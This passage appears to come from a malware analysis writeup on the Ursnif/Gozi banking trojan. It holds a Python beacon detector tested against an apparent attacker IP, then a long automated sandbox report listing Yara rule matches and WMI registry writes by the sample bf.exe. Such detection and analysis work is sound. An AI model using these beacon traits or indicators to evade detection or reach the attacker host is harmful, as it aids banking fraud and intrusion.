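    res = unwrap_uri(urlsplit(url).path)
    if res is None:
        return False
    _, ciphertext, escapes = res
    if escapes == 0 or len(ciphertext) % SERPENT_BLOCK != 0:
        return False
    return user_agent is None or user_agent.startswith(MSIE8_UA_PREFIX)


if __name__ == "__main__":
    for p in REPORT_PATHS + BENIGN_PATHS:
        res = unwrap_uri(p)
        verdict = "ursnif" if is_ursnif_beacon("http://45.8.158.104" + p) else "no"
        detail = "" if res is None else f"{len(res[1])} ciphertext bytes, {res[2]} escapes"
        print(p[:40] + "...", verdict, detail)
```

All three report paths unwrap to the same base64 length and the same ciphertext length, a whole number of 16-byte blocks, which is what you would expect from three beacons carrying the same fixed-format registration string (the version=/soft=/user=/server=/id= template in the Yara strings) encrypted under one key. That length consistency, not the .pct extension, is the property worth keying on; the extension and the /uploaded/ prefix change between campaigns.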

              Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match, File source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.615812905.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR
Source: Yara match, File source: 0.3.bf.exe.13294a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.bf.exe.12aa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.bf.exe.12aa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.bf.exe.1355940.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.bf.exe.13294a0.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.bf.exe.1355940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000C.00000000.681883913.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.613944350.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000000.680871269.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000000.684080193.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.614315107.0000000001329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              E-Banking Fraud

Source: Yara match; the file sources are identical to the list under Key, Mouse, Clipboard, Microphone and Screen Capturing above (the same 20 memory dumps, 4 process memory spaces, 6 unpacked PEs and 5 further memory dumps)

              System Summary

              Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: C:\Users\user\Desktop\bf.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
              Source: C:\Users\user\Desktop\bf.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Users\user\Desktop\bf.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\bf.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Users\user\Desktop\bf.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
              Source: C:\Users\user\Desktop\bf.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\bf.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\bf.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
              Source: C:\Users\user\Desktop\bf.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\bf.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Users\user\Desktop\bf.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Users\user\Desktop\bf.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Users\user\Desktop\bf.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\bf.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Users\user\Desktop\bf.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\bf.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\bf.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\bf.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Users\user\Desktop\bf.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: bf.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
